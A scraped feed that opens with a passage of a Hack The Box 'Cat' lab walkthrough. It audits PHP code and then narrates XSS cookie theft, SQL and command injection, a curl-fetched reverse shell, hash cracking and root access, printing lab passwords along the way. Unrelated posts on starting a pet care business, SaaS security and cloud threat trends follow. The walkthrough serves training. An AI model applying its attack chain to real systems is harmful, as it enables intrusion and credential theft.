However, the page sends AJAX POST requests to accept_cat.php and delete_cat.php without any protection against Cross-Site Request Forgery (CSRF). This means an attacker could potentially trick the admin into performing actions without their consent. Also, based on previous code, the accept_cat.php script inserts data into the database without using prepared statements, which can lead to SQL injection vulnerabilities.

To fix these issues, CSRF tokens should be added to the AJAX requests and verified on the server side. Additionally, all database queries should use prepared statements to ensure user input is handled securely. While the page handles session checks and output escaping well, the missing CSRF protection and insecure database insertion are serious security concerns.

Security Audit of view_cat.php

The view_cat.php script restricts access to the admin user 'axel' and uses prepared statements to safely query the database, preventing SQL injection. However, it outputs dynamic data such as cat_name, photo_path, age, birthdate, weight, username, and created_at directly into the HTML without escaping. This creates a Cross-Site Scripting (XSS) vulnerability because if any of these fields contain malicious code, it will execute in the admin’s browser.

The vulnerable code includes:

Cat Details: <?php echo $cat['cat_name']; ?>
<img src="<?php echo $cat['photo_path']; ?>" alt="<?php echo $cat['cat_name']; ?>" class="cat-photo">
<strong>Name:</strong> <?php echo $cat['cat_name']; ?><br>
<strong>Age:</strong> <?php echo $cat['age']; ?><br>
</code>

To mitigate this, all output should be passed through htmlspecialchars() to encode special characters and prevent script execution. Additionally, validating the image src attribute is important to avoid loading unsafe or external resources. Without these measures, the page remains vulnerable to XSS attacks.

Input Validation Analysis of join.php

The provided PHP code is vulnerable to several security issues, primarily due to improper input handling and weak security practices. Below is an explanation of the key vulnerabilities, followed by the relevant code snippets:

  1. Cross-Site Scripting (XSS): The code outputs $success_message and $error_message without sanitisation, making it susceptible to XSS attacks. User inputs (e.g., $_GET['username'], $_GET['email']) are directly echoed, allowing malicious scripts to be injected.
<?php if ($success_message != ""): ?>
   <div class="message"><?php echo $success_message; ?></div>
   <?php endif; ?>
   <?php if ($error_message != ""): ?>
   <div class="error-message"><?php echo $error_message; ?></div>
   <?php endif; ?>
  1. Insecure Password Storage: Passwords are hashed using MD5 (md5($_GET['password'])), which is cryptographically weak and easily cracked.
$password = md5($_GET['password']);
  1. SQL Injection Risk: While prepared statements are used, the code still processes unsanitized $_GET inputs, which could lead to other injection vulnerabilities if not validated properly.
  2. Insecure Data Transmission: Using $_GET for sensitive data like passwords, exposing them in URLs risks interception.

To mitigate these, use htmlspecialchars() for output, adopt secure hashing (e.g., password_hash()), validate inputs, and use $_POST for sensitive data.

Workflow Evaluation of contest.php

The PHP code for the cat contest registration page has multiple security flaws due to weak input handling and poor security practices. Below are the key vulnerabilities with relevant code snippets:

Cross-Site Scripting (XSS): The $success_message and $error_message are output without sanitization, enabling reflected XSS attacks via crafted POST inputs (e.g., cat_name=<script>alert(‘XSS’)</script>).

<?php if ($success_message): ?>
    <div class="message"><?php echo $success_message; ?></div>
<?php endif; ?>
<?php if ($error_message): ?>
    <div class="error-message"><?php echo $error_message; ?></div>
<?php endif; ?>
  • Weak Input Validation: The regex (/[+*{}’,;<>()\\[\\]\\/\\:]/) in contains_forbidden_content is too permissive, allowing potential XSS or SQL injection bypasses.
$forbidden_patterns = "/[+*{}',;<>()\\[\\]\\/\\:]/";
  • Insecure File Upload: The file upload trusts getimagesize and uses unsanitized basename($_FILES[“cat_photo”][“name”]), risking directory traversal or malicious file uploads.
$target_file = $target_dir . $imageIdentifier . basename($_FILES["cat_photo"]["name"]);

To mitigate, sanitize outputs with htmlspecialchars(), use stricter input validation (e.g., FILTER_SANITIZE_STRING), sanitize file names, restrict upload paths, and validate file contents thoroughly.

User Registration and Login

Clicking the contest endpoint redirects to the join page, which serves as the registration page.

Let’s create a new account by completing the registration process.

The registration process was completed successfully, confirming that new user accounts can be created without errors or restrictions.

Logging in with the credentials we created was successful.

After a successful login, the contest page is displayed as shown above.

Let’s complete the form and upload a cat photo as required.

Successfully submitted the cat photo for inspection.

Exploiting XSS to Steal Admin Cookie for Cat Machine

Initialise the listener.

Injected a malicious XSS payload into the username field.

Let’s create a new account by injecting malicious XSS code into the Username field while keeping all other inputs valid.

Let’s fill out the form with normal inputs as before.

The process may take a few seconds or minutes, depending on the response time. I have attempted multiple times to ensure it works successfully.

Used Firefox Dev Tools to set the cookie and gain access to admin features

Once we obtain the token hash, we need to copy and paste it into Firefox’s inspector to proceed further.

After that, simply refresh the page, and you will notice a new “Admin” option has appeared in the menu bar.

Clicking the Admin option in the menu bar redirects us to the page shown above.

Click the accept button to approve the submitted picture.

Leveraging XSS Vulnerability to Retrieve Admin Cookie for Cat Machine

Used Burp Suite to analyze POST requests.

Use Burp Suite to examine network packets for in-depth analysis.

Test the web application to determine if it is vulnerable to SQL injection attacks.

Attempting to inject the SQL command resulted in an “access denied” error, likely due to a modified or invalid cookie.

SQL Injection and Command Execution

After reconstructing the cookie, the SQL injection appears to function as anticipated.

Successfully executed command injection.

We can use the curl command to invoke the malicious file and execute it. The fact that it’s hanging is promising, indicating potential success.

It was observed that bash.sh has been transferred to the victim’s machine.

Success! A shell was obtained as the www-data user.

Database Enumeration

It’s unusual to find cat.db while searching for the database file.

Transfer the SQL file to our local machine.

We discovered that cat.db is a SQLite 3.x database.

sqlite3 cat.db opens the cat.db file using the SQLite command-line tool, allowing you to interact with the database—run queries, view tables, and inspect its contents.

The cat.db database contains three tables: accepted_cats, cats, and users, which likely stores approved cat entries, general cat data, and user information, respectively.

Immediate cracking is possible for some obtained hashes.

The screenshot shows the hashes after I rearranged them for clarity.

Breaking Password Security: Hashcat in Action

We need to specify the hash mode, which in this case could be MD5.

We successfully cracked the hash for the user Rosa, revealing the password: soyunaprincesarosa.

Boom! We successfully gained access using Rosa’s password.

The access.log file reveals the password for Axel.

The user Axel has an active shell account.

The credentials for Axel, including the password, were verified successfully.

Access is achievable via either pwncat-cs or SSH.

Executing the appropriate command retrieves the user flag.

Escalate to Root Privileges Access on Cat Machine

Privilege Escalation

The Axel user does not have sudo privileges on the cat system.

Email Analysis

We can read the message sent from Rosa to Axel.

The emails are internal updates from Rosa about two upcoming projects. In the first message, Rosa mentions that the team is working on launching new cat-related web services, including a site focused on cat care. Rosa asks Axel to send details about his Gitea project idea to Jobert, who will evaluate whether it’s worth moving forward with. Rosa also notes that the idea should be clearly explained, as she plans to review the repository herself. In the second email, Rosa shares that they’re building an employee management system. Each department admin will have a defined role, and employees will be able to view their tasks. The system is still being developed and is hosted on their private Gitea platform. Rosa includes a link to the repository and its README file, which has more information and updates. Both emails reflect early planning stages and call for team involvement and feedback.

Checking the machine’s open ports reveals that port 3000 is accessible.

Therefore, we need to set up port forwarding for port 3000.

Gitea Exploitation on Cat Machine

A screenshot of a computer

AI-generated content may be incorrect.

The service running on port 3000 is the Gitea web interface.

A screenshot of a login screen

AI-generated content may be incorrect.

Using Axel’s credentials, we successfully logged in.

Gitea service is running version 1.22.0, which may contain specific features and known vulnerabilities relevant for further evaluation.

Start the Python server to serve files or host a payload for the next phase of the assessment.

Inject the XSS payload as shown above.

The fake email is sent to the user jobert to test the functionality.

Obtained a base64-encoded cookie ready for decoding.

The decoded cookie appears to contain the username admin.

Edit the file within the Gitea application.

Obtained the token as shown above.

A screenshot of a computer screen

AI-generated content may be incorrect.
<?php
$valid_username = 'admin';
$valid_password = 'IKw75eR0MR7CMIxhH0';

if (!isset($_SERVER['PHP_AUTH_USER']) || !isset($_SERVER['PHP_AUTH_PW']) || 
    $_SERVER['PHP_AUTH_USER'] != $valid_username || $_SERVER['PHP_AUTH_PW'] != $valid_password) {
    
    header('WWW-Authenticate: Basic realm="Employee Management"');
    header('HTTP/1.0 401 Unauthorized');
    exit;
}

This PHP script enforces HTTP Basic Authentication by verifying the client’s username and password against predefined valid credentials: the username “admin” and the password “IKw75eR0MR7CMIxhH0.” Upon receiving a request, the script checks for authentication headers and validates them. If the credentials are missing or incorrect, it responds with a 401 Unauthorised status and prompts the client to authenticate within the “Employee Management” realm.

The password discovered grants root access and functions as an administrator password on Windows machines.

Executing the appropriate command retrieves the root flag.

The post Hack The Box: Cat Machine Walkthrough – Medium Diffculity appeared first on Threatninja.net.

Paws for Success: The Pet-Preneur’s Guide to Starting your own Pet Care Business

23 January 2023 at 08:43

Pets are adopted for unconditional love and to have one who’s always with us. Simultaneously, pets do need proper care and attention to stay fit. It’s the responsibility of the pet owner to take of their pet’s food, health, exercise, and other necessities.

However, when the owner needs to go out for a business trip or vacation, they need to board pets at Kennel. But it’s not a good alternative to pet care as separation from the home environment makes pets and their owners anxious. Here come pet care business services to the rescue. Pet care business provides a wide range of pet services that ensures the complete care of the pets.

With the presence of reimbursement policies and increasing pet humanization, the pet care market size is growing at scale. According to research, the pet care market size is expected to become $550 billion by 2032 with a 7% growth from 2022-2032.

The growing market volume of the pet care industry creates lucrative business opportunities for those who love pets. Starting a pet care business is a great idea to make millions a year with various pet care services. Before we jump into the pet care business to make the most out of the wide opportunities, take a look at the different service applications that you can consider as your profession.

From Grooming to Boarding: Understanding the Different Pet Care Businesses

pet care business ideas

The pet care industry is divided into various pet business models that are helping pet lovers fur-ever care of their pets. Exploring different types of Pet-friendly businesses can have positive effects on professionals as it will aid them to make inroads into the million-dollar pet care industry. Let’s have a look at some of the remarkable pet care businesses that are available –

Pet grooming: Professionals can start grooming boutiques that provide pet grooming services such as facials, massages, pedicures, teeth cleaning, and aromatherapy.

Pet boarding and kennels: Boarding facilities for pets are extended to the days till when the owner is out of town. The pets are left in a kennel for homely feeling while interacting with other animals.

Pet Daycare: Get a land or building and allow pet owners to drop their pets off in the morning and take them back in the evening. Meanwhile, pets are fed, walk, and had fun outside.

Pet retail and supplies: Launch a pet retail store where pet owners can buy everything that they need for pet care from food to accessories.

Pet marketplace app: Create a platform such as a mobile, website, or software system where pet item sellers can register and sell things online that enables pet owners to get everything under one roof.

Pet adoption app: Launch a mobile pet adoption business where pet owners will get a list of various breeds of pets and get connected with the pet owner to buy them.

Dog walking: Start a dog walking business by taking the dogs for a walk, making them exercise, and spending a few hours outside in exchange for a few bucks.

Pet sitting: Professionals visit the home and take care of pets when the owner needs to go out. You can carve out the niche where you provide pet care services.

On-demand vet app: Launch an on-demand vet business app that helps pet owners easily get connected with pet vets or veterinarians so that they can get immediate medication help.

Pet food delivery app: Get into the pet food delivery business wherein pet food retailers supply pet food to the doorstep of the pet owners.

Pet wearable app: Pet owners can identify their pet’s location in real-time with a wearable device attached to the pet that helps them track every movement anytime, anywhere.

Pet training & counseling: You can start providing counseling services to the owner to better take care of their pet and train the pets at home or other places.

Pet matchmaking app: Help pet lovers to get the best pet animal matching their needs such as a family pet, safety pet, or companion pet with pet matchmaking app engineering. Also, one can help to connect 2 pets for matchmaking as well.

Pet exercise tracker app: Enable pet owners to keep an eye on their pet’s exercise and other activities right on their mobile with pet exercise tracker app development.

Dog park locator app: Allow pet owners to easily find out the nearby park where they can take their dog for a small walk or fun through the dog park locator app.

From Dream to Reality: Starting Your Own Pet Care Business

How to Start Pet Care Business

Starting a pet care business is more than business registration with the state government. Here’s the step-by-step guide that helps you begin and launch a successful pet care business. Take a tour through all the steps-

Business plan

First, map out the business specifics with well-defined strategy creation, risk identification, and discovery of unknown factors. The business plan defines business description such as types of pets to take care of, accommodation facilities to arrange, and business niches like- pet daycare or pet grooming.

After summarizing the business description, figure out the cost involved in starting the pet care business followed by ongoing expenses. Post-calculation of the pet care business cost, find out the ways to make money and set up the prices for pet care services to keep your business profitable.

Not to forget, select the business name and get it registered. However, before business name registration, you can research for business name on social media channels, federal and state trademark records, and state business records. Having a business plan for your pet care business requirement in detail will help you to get a good Return on Investment in less time.

Financing option

Starting a pet care business is sometimes an inexpensive and costly affair as well. If your pockets are not deep and require finances to start a pet care business, then you need to look for funding options, such as crowdfunding or angel investment.

With financial statement analysis, and profit and loss estimation, create a financial plan to know how much funds you need. Thereafter, you can get connected with investors to fund your pet care business project, and apply for loans, or mortgages to have the necessary funds to get started.

Licensing and regulations

Some locations require pet care businesses to have permits and licenses to operate. You should check with your local authorities for a license and permit you should obtain. A sales tax license or permit is also required to sell any kind of pet care products and services. Small business administration can help you understand which license you need.

Check the regulations rolled out for enabling pet care services in the home or the lease/rent property. State laws put restrictions on the number of pets taken care of at one time. Thereafter signing a service agreement is important that details the services, pricing, visits, payment option, and others.

Equipment and supplies

Some pet care services are modernized that require equipment and supplies. For instance, you need to have an animal clipper, pet shampoo, pet healthcare products, pet soap, clothing, a toothbrush, and more supplies for providing pet grooming services. In the same vein, bathing stations, grooming tables, grooming shears, and more are needed as equipment.

Identify your business niche and then research the equipment setup and supplies required to deliver the best pet care services.

The Ultimate Checklist for Managing a Pet Care Business

How to manage a pet care business

After starting your pet care service business you need to manage it in the best way possible to ensure it runs smoothly and properly. Here are the ways to take care of your pet care business:

Staffing and training

Some pet services require professionals to get certification and training so that they can deliver better pet care services. Ensure the pet care providers must have a certain level of expertise and skills such as the pet’s behavioral or dietary issues that makes pet owners feel their pet is in safe hands.

For instance, Hiring trained dog walkers guarantees that they can handle various types of dogs properly because they are aware of the cautious precautions to be taken when handling and treating pets.

Bookkeeping and accounting

To successfully run a business of pet services legitimately, you are liable for various responsibilities such as bookkeeping, accounting, taxes, and more. The owner should create a business account for transactions that are kept separate from the personal account. Use accounting software for expenses and revenue tracking and link it with the business account. Later, account reconciliation is important to ensure no record duplication, which is a great help during the audit.

Insurance liability

Having insurance is a must in pet care services as you are engaging with living animals. Obtaining liability insurance helps you protect employees, property, and other people. Property insurance is a must when you are providing pet care services outside the home say dog walking services. Also, employees are covered with worker’s insurance compensation.

Customer service and satisfaction

The user-centric business needs quality pet care service delivery to make the pet owners happy and satisfied. It requires pet care service provider to hire pet-friendly employees, adjust service prices, and build pet care software application that attracts maximum customers and make them repetitively use the services. You can take this as an opportunity that enables you to consistently deliver the best customer experience and keep the positive impact forever.

Marketing and advertising

Moving ahead according to the business plan, you made everything ready. Now, it’s high time to spread the word about the pet care services that you offer to pet parents. There are a couple of ways to market and promote your pet care services business uniquely.

Harness social power: Create business pages on social media platforms such as Instagram, Facebook, LinkedIn, and Twitter, or list your business on the classified or business listing directories such as Yelp, Foursquare, Thumbtack, Angi, and Craigslist. Post pictures and reviews of customers regularly to get more popular.

Loyalty program: Provide incentives to the existing customers or reward them for showing their patronage of the business. You can also reward them for bringing in new clients.

Furry Ventures!

If you are the one with an entrepreneurial mindset and experience low stress while spending time with pets, the pet care business idea is great for you. With the growing preferences of pet owners to get their pets taken care of by professional pet care service providers, the opportunities are immense. Be compassionate and provide quality care to launch a pet care startup like a pro.

The step-by-step process to start a pet care business and tips to best manage the business allow you to launch and prosper the business boundlessly. Choose your niche and start it right away!

The post Paws for Success: The Pet-Preneur’s Guide to Starting your own Pet Care Business appeared first on TopDevelopers.co.

Strengthen Your SaaS Security with SaaS Ops

29 September 2022 at 05:45

What exactly is SaaS Security?

Many organizations have multi-cloud setups, with the average corporation employing services from at least five cloud providers. Compatibility problems, contract breaches, non-secured APIs, and misconfigurations are among the security hazards cloud computing brings, which is popular.

SaaS configurations are an attractive target for cybercriminals because they store a large amount of sensitive data, such as payment card details and personal information. Consequently, enterprises need to emphasize the importance of SaaS security. 

SaaS security includes techniques companies use to secure their assets while employing SaaS architecture. According to the UK’s National Cyber Security Centre (NCSC), SaaS security rules, the client and the service provider or software distributor must share security responsibilities. Moreover, service providers offer SaaS Security Posture Management (SSPM) solutions that automate and manage SaaS security.

As SaaS usage and adoption continue to increase, so does the SaaS security problem. The top SaaS security issues are misconfigurations, access management, compliance, data storage, retention, privacy and data breaches, and disaster recovery.

It is easy to believe that protecting SaaS only prevents users from accessing the internet. However, securing SaaS usage is far more challenging than it initially appears.

The fact is that there is no universal, all-encompassing SaaS security checklist. Businesses vary; they perform distinct tasks, operate differently, and have specific needs. Check out this article by Zluri.

Why is SaaS Security a priority?

Many firms are familiar with IaaS and PaaS security threats. IT and security teams frequently communicate through linked business processes and applications. IaaS and PaaS management and security technologies are also widespread.

SaaS security can safeguard a corporation from cyberattacks and data leaks. Any SaaS company should take security precautions to secure its data, assets, and reputation. 

SaaS programs work differently and provide advantages to businesses. However, they can be more difficult to administer from a security standpoint:

 

The design of SaaS applications supports a range of teams inside a business. For example, Record systems are utilized for client data by sales teams, source code by development teams, and HR information by HR teams. Such SaaS apps are typically used regularly by many end-users with varying degrees of technical expertise. SaaS apps are challenging to understand due to their volume and complexity.

Communication:

There is limited communication between security teams and the business administrators who pick and manage new SaaS technology. Limited team contact makes it more challenging for security teams to identify the breadth of use and related dangers when fully operating apps.

Collaboration:

The internal teams supporting SaaS services typically lack the requisite advice to safeguard them. Constant communication is necessary for balancing business and security requirements. To maintain consistency, enterprises should invest more resources and effort in identifying and addressing security issues and treat SaaS like bare metal, IaaS, PaaS, and endpoint security. 

The security problems that SaaS users face

McKinsey surveyed cybersecurity specialists from over 60 firms to understand how they handled SaaS security concerns. Most respondents said they had increased their attention on SaaS security, highlighting their and their providers’ security offerings.

As expected, Chief Information Security Officers (CISOs) were frustrated by suppliers’ security deficiencies. They complained about contractual and implementation delays and customer-centric security. They wanted SaaS companies to enable security experts to understand product security and set up and integrate them more simply.

Most respondents used SaaS for IT service management and office automation. But, given the dangers, several CISOs said their firms weren’t ready for SaaS in essential areas. Resource planning software was deemed too risky since downtime may cripple the company. Due to data confidentiality, companies hesitated to utilize SaaS for health-related or mergers-and acquisitions applications.

With more complex technologies like AI, cyberattacks become more sophisticated. For this reason, you must regularly review your SaaS security procedures. Listed here are the eight most prevalent SaaS security concerns, in case you are unfamiliar with them. 

1. Management of Identity and Access

A CISO establishing a SaaS application security strategy must include access management as one of the fundamental foundations. However, if not done precisely, it can create a security hole that allows an attacker to enter. 

Single Sign-On

Examples of successful ‘Identity and Access Management (IAM) strategies implemented by SaaS companies include Single Sign-On (SSO) and Secure Web Gateways (SWG). With SSO, the user must log in once to access all linked services inside a single ecosystem. However, if the provider has a secure access mechanism, SSO might introduce SaaS security problems, as it enables simple tracking of ID and password and access to multiple services. 

2. Virtualization

Most SaaS services utilize virtualization because it provides more uptime than conventional computers. Nonetheless, if a single virtual machine is hacked, numerous parties may have problems since data is copied across servers. Virtualization has substantially improved mobile app security over the years, but there are still vulnerabilities that hackers are likely to exploit. 

3. Obscurity

The SaaS model concentrates on application and business continuity while the service providers make infrastructure and architecture decisions. Occasionally, these suppliers withhold crucial back-end information, a significant red flag. CISOs should hold one-on-one meetings with service providers and inquire about their security measures. Remember that you must select a service that can provide adequate responses on data security. 

4. Accessibility

Suitable SaaS applications are available from any location. This benefit, however, might soon become negative if the devices accessing the application are infested with viruses and malware. In addition, if the user accesses the application over a public WiFi network or VPN, it might pose a security risk to your infrastructure. Therefore, CISOs should prioritize safeguarding all endpoints to prevent such threats. 

For example, the NHS (National Health Service) is a publicly financed healthcare institution established in the United Kingdom. The system contains voluminous sensitive data, such as patients’ health information, physicians’ information, pharmaceutical data, etc. Therefore, protecting every endpoint was essential. The university then cooperated with Cisco, which helped build the SecureX unified security platform. This technology protects the NHS’s highly targeted PII (Personally Identifiable Information) against internet thieves. It also allows users to protect data from phishing attempts, ransomware, data exfiltration, etc. 

5. Data Control

With SaaS, all data is stored and managed on the cloud, leaving you little control over data storage and management. If you have a problem, you are relying on the service providers. Before signing a contract, ask the SaaS provider about data storage patterns, security measures, and disaster recovery processes. After receiving positive responses, you can form a partnership with the supplier. 

6. Misconfigurations

SaaS apps are renowned for incorporating several complex features into a single solution. However, they add complexity to the code and increase the likelihood of misconfigurations. Even a little coding error might influence the availability of your cloud services. In one of the most disastrous misconfigurations of 2008, a Pakistani Telecom application attempted to restrict YouTube for legal reasons. However, in trying to block YouTube, they established a dummy route that resulted in misconfigurations, resulting in YouTube being unavailable worldwide for two hours. 

7. Disaster Restoration

Regardless of the security procedures, you employ to protect your application, server, infrastructure, and data; there is always the possibility of a disaster since the future is unpredictable. CISOs should ask suppliers of SaaS security solutions: 

  • In the event of a catastrophe, what happens to all cloud-stored data?
  • Do you ensure complete data recovery?
  • Do you include catastrophe recovery in your service-level agreement?
  • How long will it require to retrieve and restore the data? 

5 Ways to Strengthen your SaaS Security with SaaS Ops

 SaaS Security with SaaS Ops

Source

  1. Develop Real-time Security Observability and Ongoing System Monitoring 

Due to the dynamic infrastructure, changes in SaaS settings tend to occur often, and this has instantaneous effects, and influence on many resources. Running a SaaS infrastructure without real-time security monitoring and observability is equivalent to flying blind. 

     2.Configure and Constantly Monitor Configuration Settings

The SaaS landscape is constantly evolving. Since services are frequently launched and withdrawn in real time, configuring them correctly and monitoring settings can help you secure your customers’ data. 

    3.Utilize Operations Theory for Security

Practical operations principles may address tech sprawl, lack of integration between tool sets, lack of visibility, and operations running at the speed of business without security checks. Remember, “Great ops = great security.” 

    4.Protect Data

Storing unencrypted data on the cloud might expose your business to reputational harm, revenue loss, and customer loss. Encryption is one of the simplest and the most effective methods for securing client information.

 Obtain Compliance & Regulatory Consulting Services, IT Audits, Risk & Security Management solutions, and training programs that meet the industry’s Regulatory Compliance and Information Security problems.

   5.Measure & Enhance Performance

If you have a method for measuring performance, you can examine the impact of infrastructure modifications. Consequently, you may accomplish the constant security and performance enhancements essential for enhancing client relationships.

Now that you have a better grasp of the SaaS data security landscape, let’s examine the measures you can take to secure this at your organization: 

1. Document your Data Processing Actions

Regarding SaaS data security, RoPA is only one starting point. RoPA stands for Record of your Processing Activities, a requirement of the GDPR. You are compelled by law to comply with this requirement.

Consider this an overview of all of your data processing procedures. It is a single document detailing your company’s data processing activities. Some examples of personal information processing activities include marketing, human resources, and third-party operations.

This is vital not just because the GDPR needs it but also because it assists organizations with self-auditing. If you keep track of and comprehend your data processing operations, you will be in the greatest position to implement data security.

After all, you cannot manage risks without first identifying them, correct?

2.Establish Authentication Methods and Necessitate a Formidable Password

Implementing appropriate access controls is one of the most critical measures to reduce the likelihood of a data breach. The first line of defense in this regard is a strong password.

Whenever a user establishes an account, you must ensure that they choose a secure and effective password, which should contain a combination of uppercase and lowercase letters, numbers, and special characters. Do not permit the use of clearly identifiable terms as passwords.

Verify that you do not depend solely on passwords to grant access to an individual’s account. Multi-factor authentication necessitates completing more than one step before admittance is granted.

Several more alternatives are available, such as requiring the user to enter a code provided to their cell phone or doing facial verification. It depends on the software you give and the individuals utilizing it. 

3. Educate both your Consumers and your Staff

Education is essential for data security. You must do all your power to ensure that everyone using your program has the security expertise.

Did you know that 94% of businesses have had an insider data breach? While a few of these incidents may have been caused by malevolent employees, the great majority have been the consequence of unintended employee acts.

If they had received training on data security, this event might never have occurred.

The issue is that many companies are only concerned with the expense and resources associated with training. Nonetheless, it is crucial to calculate how much money you would lose if you were the victim of a data breach.

In addition, you must ensure that you are simultaneously teaching your clients. According to Gartner, customers will be accountable for 95% of cloud security breaches.

Whether releasing critical upgrades to existing clients or onboarding new ones, you must actively inform them how their activities affect security.

A growing number of SaaS companies are transitioning to cloud-based infrastructures. The great majority of customers are unaware of the ramifications of this decision. Educating your customers on how to secure their data is essential to reduce the likelihood of a security breach. 

4. Continuously Monitor User Responsibilities and Access

In addition to the topics we’ve already discussed, you must continue to monitor division of duties (SOD) infractions.

SaaS applications are developed using initialized roles. However, as time passes, these roles and the users may get confused, leading to SOD violations, and it can be a significant compliance burden.

To prevent SOD breaches, you must regularly monitor people and their assigned roles. 

5. Employ a Cybersecurity Company

If you are having trouble with SaaS data security, you should contact a cybersecurity company with experience in this field. Security is a challenging subject to master. On the other hand, you cannot afford to cut shortcuts since doing so might result in your company suffering a data breach, which could cost you hundreds or millions of dollars!

A good cybersecurity company can do a vulnerability assessment and even provide services such as penetration testing. This is ethical hacking if you have never heard the term before. It suggests that someone with good intentions will hack into your system before someone with malicious purpose. This will notify you of any software vulnerabilities so that you may make the necessary modifications.

Numerous aspects must be considered while searching for a reputable cybersecurity company. You want a corporation with a solid reputation and extensive industry expertise.

Concerning experience, you should not only seek a company with a substantial number of years under its belt, but you should also ensure that they have extensive expertise dealing with SaaS organizations.

Principles of saas security

Tips for SaaS security

 These strategies can protect SaaS environments and assets.

1.Authentication Strengthening

Cloud providers handle authentication differently, making it challenging to decide how customers should access SaaS applications. Some manufacturers support customer-managed identity providers like Active Directory (AD) with SAML, OpenID Connect, and Open Authorization. Some providers allow multifactor authentication. Some don’t.

The security team must know which services are used and the alternatives each service supports to manage SaaS products. This context allows administrators to choose the proper authentication method(s).

If the SaaS provider supports it, a single sign-on (SSO) connected to AD ensures that account and password policies match the application’s services.

2.Encryption of Data

The channels that interface with SaaS apps use Transport Layer Security (TLS) to secure data in transit. Some SaaS suppliers offer data-at-rest encryption. This feature may be defaulted or activated.

Investigate each SaaS service’s security procedures to discover if data encryption is possible and activate it if so. 

3.Oversight and Vetting

Review and examine any prospective SaaS provider (as you would with other vendors). Make sure you know how the service is used, its security model, and any extra security precautions. 

4.Discovery and Inventory

Tracking all SaaS usage is essential as usage patterns might be unpredictable, especially when apps are quickly launched. Ensure you hunt for fresh, untracked SaaS use and be watchful for changes. When possible, combine human and automatic data collection to keep up with growing SaaS consumption and maintain a reliable, up-to-date inventory of services and users. 

5.Cloud Access Protection Broker (CASB) tools

Consider employing a CASB solution when the SaaS provider does not provide enough security. CASB allows organizations to build SaaS-unique controls. Examine the SaaS provider’s security issues. You should also know the CASB deployment choices so you may choose the suitable configuration (API or proxy-based) for your organization’s architecture. 

6.Situational Awareness

Review data from CASBs and the SaaS provider’s data and logs to monitor SaaS consumption. IT and security directors must treat SaaS products differently from conventional websites since they are complex tools requiring the same degree of protection as any business application.

Adopting SaaS security best practices with systematic risk management provides consumer and enterprise SaaS security.

7.Utilize SaaS Security Posture Management (SSPM)

SSPM ensures SaaS apps remain secure. An SSPM system monitors SaaS applications for gaps between declared security policy and actual security posture, allowing you to automatically detect and repair security vulnerabilities in SaaS assets and prioritize risk severity.

SaaS Security Posture Management

Source

To summarize, we can say that many businesses rely on SaaS applications to perform mission-critical operations. Hence they must give the security measures around SaaS the same level of importance as those surrounding other technologies. It is possible to maintain the security of your data and the seamless operation of your business by continuously monitoring your SaaS environment, fixing misconfigurations as soon as they are discovered, and maintaining a tight check on third-party access to your systems.

5 / 5 ( 2 votes )

Why is securing the external attack surface a hot topic for security experts right now?

By: detectify
23 February 2022 at 07:09

One of the most prevalent realizations in the cybersecurity world over the last 5 years has been that many organizations are simply not aware of the vastness of their external attack surface. This has given rise to a defensive principle called “External Attack Surface Management“, or EASM. Without an EASM program at your organization, there is a high chance that your external assets will fall into a state of vulnerability at some point. In this article, we’ll discuss why this is the case and how we might defend against it.

The post Why is securing the external attack surface a hot topic for security experts right now? appeared first on Detectify Blog.

Old Habits Die Hard: New Report Finds Businesses Still Introducing Security Risk into Cloud Environments

14 September 2022 at 06:00

While cloud computing and its many forms (private, public, hybrid cloud or multi-cloud environments) have become ubiquitous with innovation and growth over the past decade, cybercriminals have closely watched the migration and introduced innovations of their own to exploit the platforms. Most of these exploits are based on poor configurations and human error. New IBM Security X-Force data reveals that many cloud-adopting businesses are falling behind on basic security best practices, introducing more risk to their organizations.

Shedding light on the “cracked doors” that cybercriminals are using to compromise cloud environments, the 2022 X-Force Cloud Threat Landscape Report uncovers that vulnerability exploitation, a tried-and-true infection method, remains the most common way to achieve cloud compromise. Gathering insights from X-Force Threat Intelligence data, hundreds of X-Force Red penetration tests, X-Force Incident Response (IR) engagements and data provided by report contributor Intezer, between July 2021 and June 2022, some of the key highlights stemming from the report include:

  • Cloud Vulnerabilities are on the Rise — Amid a sixfold increase in new cloud vulnerabilities over the past six years, 26% of cloud compromises that X-Force responded to were caused by attackers exploiting unpatched vulnerabilities, becoming the most common entry point observed. 
  • More Access, More Problems — In 99% of pentesting engagements, X-Force Red was able to compromise client cloud environments through users’ excess privileges and permissions. This type of access could allow attackers to pivot and move laterally across a victim environment, increasing the level of impact in the event of an attack.
  • Cloud Account Sales Gain Grounds in Dark Web Marketplaces — X-Force observed a 200% increase in cloud accounts now being advertised on the dark web, with remote desktop protocol and compromised credentials being the most popular cloud account sales making rounds on illicit marketplaces.
Download the Report

Unpatched Software: #1 Cause of Cloud Compromise

As the rise of IoT devices drives more and more connections to cloud environments, the larger the potential attack surface becomes introducing critical challenges that many businesses are experiencing like proper vulnerability management. Case in point — the report found that more than a quarter of studied cloud incidents were caused due to known, unpatched vulnerabilities being exploited. While the Log4j vulnerability and a vulnerability in VMware Cloud Director were two of the more commonly leveraged vulnerabilities observed in X-Force engagements, most vulnerabilities observed that were exploited primarily affected the on-premises version of applications, sparing the cloud instances.

As suspected, cloud-related vulnerabilities are increasing at a steady rate, with X-Force observing a 28% rise in new cloud vulnerabilities over the last year alone. With over 3,200 cloud-related vulnerabilities disclosed in total to date, businesses face an uphill battle when it comes to keeping up with the need to update and patch an increasing volume of vulnerable software. In addition to the growing number of cloud-related vulnerabilities, their severity is also rising, made apparent by the uptick in vulnerabilities capable of providing attackers with access to more sensitive and critical data as well as opportunities to carry out more damaging attacks.

These ongoing challenges point to the need for businesses to pressure test their environments and not only identify weaknesses in their environment, like unpatched, exploitable vulnerabilities, but prioritize them based on their severity, to ensure the most efficient risk mitigation.

Excessive Cloud Privileges Aid in Bad Actors’ Lateral Movement

The report also shines a light on another worrisome trend across cloud environments — poor access controls, with 99% of pentesting engagements that X-Force Red conducted succeeding due to users’ excess privileges and permissions. Businesses are allowing users unnecessary levels of access to various applications across their networks, inadvertently creating a stepping stone for attackers to gain a deeper foothold into the victim’s cloud environment.

The trend underlines the need for businesses to shift to zero trust strategies, further mitigating the risk that overly trusting user behaviors introduce. Zero trust strategies enable businesses to put in place appropriate policies and controls to scrutinize connections to the network, whether an application or a user, and iteratively verify their legitimacy. In addition, as organizations evolve their business models to innovate at speed and adapt with ease, it’s essential that they’re properly securing their hybrid, multi-cloud environments. Central to this is modernizing their architectures: not all data requires the same level of control and oversight, so determining the right workloads, to put in the right place for the right reason is important. Not only can this help businesses effectively manage their data, but it enables them to place efficient security controls around it, supported by proper security technologies and resources.

